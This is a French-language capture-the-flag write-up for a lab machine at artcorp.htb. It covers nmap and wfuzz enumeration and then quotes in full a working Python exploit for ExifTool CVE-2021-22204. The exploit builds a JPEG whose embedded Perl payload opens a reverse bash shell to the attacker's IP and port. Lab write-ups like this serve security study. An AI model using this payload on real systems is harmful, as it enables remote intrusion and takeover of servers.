# BOX finale
Maxence Giroult
---
[TOC]
## Découverte
```
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-20 07:12 EDT
Nmap scan report for 10.129.78.117
Host is up (0.021s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## Analyse
```bash=
wfuzz -c -f sub-fighter -w subfuzz.txt -u 'http://artcorp.htb' -H "Host: FUZZ.artcorp.htb" --hw 290 | grep 200
```
On constate qu'un sous domaine est existant, il se nomme "dev01".
Ensuite on peut remaquer l'existence de la page "metaview"
En cherchant sur internet simplement POC Exiftool Vulnerability on tombe sur une CVE.
https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
On retrouve ce script python qui permet de générer un fichier jpeg rentrer dans "MetaView car il s'agit d'un exiftool qui tourne derrière.
```python=
#!/usr/bin/python3
#
# Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image.
#
# This script installs all the required software and generates all the required files for creating an RCE image file to exploit CVE-2021-22204.
#
# Title: ExifTool CVE-2021-22204 - Remote Code Execution
# Date: 23/01/2022
# Written by: LazyTitan33
# https://github.com/LazyTitan33
# https://twitter.com/LazyTitan33
#
# Original research here: https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
from PIL import Image
import subprocess
import base64
import os
ip = '10.142.0.253' # change this to your IP
port = 3535 # change this to your port
img = Image.new('RGB', (50, 50), color = 'red')
img.save('payload.jpg')
payload = b"(metadata \"\c${use MIME::Base64;eval(decode_base64('"
payload = payload + base64.b64encode( f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({port},inet_aton('{ip}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/bash -i');}};".encode() )
payload = payload + b"'))};\")"
payload_file = open('payload', 'w')
payload_file.write(payload.decode('utf-8'))
payload_file.close()
filename = "configfile"
content = '''%Image::ExifTool::UserDefined = (
# All EXIF tags are added to the Main table, and WriteGroup is used to
# specify where the tag is written (default is ExifIFD if not specified):
'Image::ExifTool::Exif::Main' => {
# Example 1. EXIF:NewEXIFTag
0xc51b => {
Name => 'HasselbladExif',
Writable => 'string',
WriteGroup => 'IFD0',
},
# add more user-defined EXIF tags here...
},
);
1; #end%
'''
with open(filename, 'w') as f:
print(content, file=f)
subprocess.call(['sudo', 'apt', 'install', '-y', 'djvulibre-bin', 'exiftool'], stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
subprocess.call(['bzz', 'payload', 'payload.bzz'], stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
subprocess.call(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'], stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
subprocess.call(['exiftool', '-config', 'configfile', '-HasselbladExif<=exploit.djvu', 'payload.jpg'], stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
subprocess.call(['rm', 'configfile', 'payload.bzz', 'payload', 'exploit.djvu', 'payload.jpg_original'], stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
print(''',-.___,-.
\_/_ _\_/
)O_O( payload.jpg image is ready to be used.
{ (_) }
`-^-'
Art by Hayley Jane Wakenshaw''')
```
On se met en écoute sur notre machine, puis on upload le fichier afin de prendre la main
Une fois le fichier jpeg envoyé, nous avons la main sur la machine
Sign in with Wallet
Connect another wallet